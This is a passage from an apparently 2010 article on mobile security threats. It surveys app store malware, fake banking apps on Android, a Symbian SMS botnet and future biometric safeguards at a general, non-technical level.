There are numerous attack methods available to the cybercriminal via these stores - PRS, SMS or MMS silent calling (as previously highlighted) as well as parsing sensitive phone data (contact book, calendar data, password files etc.) to remote servers, whereby your personal and financial data would be available to the highest bidder.

Applications are developing rapidly with geo-tagging capability, harnessing both GPS and cell site information to pinpoint your location within a few meters. In effect someone could watch you leave your home, track your whereabouts and collect useful information about you to steal your identity or, worse, burgle your home when they know you are not in. All this could be controlled/initiated from thousands of miles away.

Current third party application security issues stem from remote servers auto-dialling international phone numbers without the user's consent. This leads to hefty invoices for unsuspecting users. Application stores have seen some large increases in growth in recent years. This large increase in application development has also helped increase the malware threat. See below:

Mobile security vendor Lookout have identified across their install base 4 pieces of malware and spyware per 100 mobiles in December 2009, which has now increased to 9 pieces of malware and spyware per 100 mobiles by May 2010. That equates to more than double the prevalence of malware and spyware on mobiles in less than 6 months. Nearly all these have propagated through application stores.
Reference: Lookout 2010 (c)



With the rate at which mobiles are growing, and with the number of applications being downloaded projected to reach 50 billion, it is clear to see why malware is also increasing. Malware writers are beginning to see the exploit opportunity.

The Android Application store is one such store that doesn't provide much in the way of high level application certification. Google recently pulled dozens of unauthorised mobile-banking applications from its Android Marketplace. The applications, priced at $1.50, were made by a developer named 09Droid and claimed to offer access to accounts at many of the world's banks.

Figure 2. Mobile Malware Comparison Trends for 2008 and 2009, Kaspersky (c)



Google said it pulled the applications because they violated its trademark policy.

The application itself was actually useless - it didn't do anything malicious either, but it could have collected customer banking credentials. Android, unlike Apple or BlackBerry, does not have employees vetting applications, which is a serious security and trust issue.

The Future 

No one is entirely sure (in the mobile security world) why mobiles continue to use default TCP/IP functionality and allow access to APIs; these two channels allow for malware propagation. The mobile botnet has in a small way arrived, allowing malware writers the opportunity to incorporate remote control channels into their mobile applications.

Mobile application websites allow developers complete access to the TCP/IP stack within smartphones, thereby allowing them more API functionality, which in turn gives them greater access to a smartphone's operating system. The current attack vector, as previously highlighted, has mainly been through Trojans or mobile application stores, MMS or desktop synchronisation software/software updates. The mobile botnet hasn't really taken off yet, due in part to the multitude of operating systems, but one suspects this might be about to change. See the Google Android story discussed earlier.

The biggest challenge for the creators of botnets is the financial prospect. At the moment there isn't much of a financial incentive to develop mobile botnets when there are significant financial returns to be made in the PC botnet market. The costs of developing mobile botnets are considerably higher than for PC-based malware. Expect botnet convergence in the future, but not quite yet.

In July of this year (2010), Symbian Series 60 handsets were used to create a botnet. 100,000 smartphones had apparently been compromised with the botnet. The malware posed as a game and was programmed to send SMS messages from compromised mobile devices. The botnet sent an SMS to the entire contact book or to some contacts - it also connected to a remote server. The malware would then delete sent messages from the Outbox and SMS log.

Safeguarding the mobile future 

As for safeguarding your current mobile device, Fujitsu 
for example has already begun rolling out fingerprint 
based biometric security across some of its range and 
in the near future voice or even inner-ear activated 
devices will be widely available, allowing corporations 
to protect their data fully when it's not in use. Other uses 
could include individual workspaces within a single 
device, enabling a user to pick the device up and have 
his or her data downloaded automatically, once their 
identity has been confirmed - a function which could 
prove invaluable with shared hardware. 



As our mobiles become less the exception and more the norm, the concept of all forms of necessary data being held within our device is gathering momentum. Our credit cards, passports, insurance documents etc. could all be carried around with us in our hip pocket, securely protected and unable to be used without our presence. This is a very scary thought.

Final Thoughts 

The mobile botnets of tomorrow will no doubt increasingly look like the PC-based botnets we see today. The mobile telecommunication carriers will also face huge challenges, both in securing their network from denial of service attacks and in protecting users' smartphones from botnet and Trojan attacks.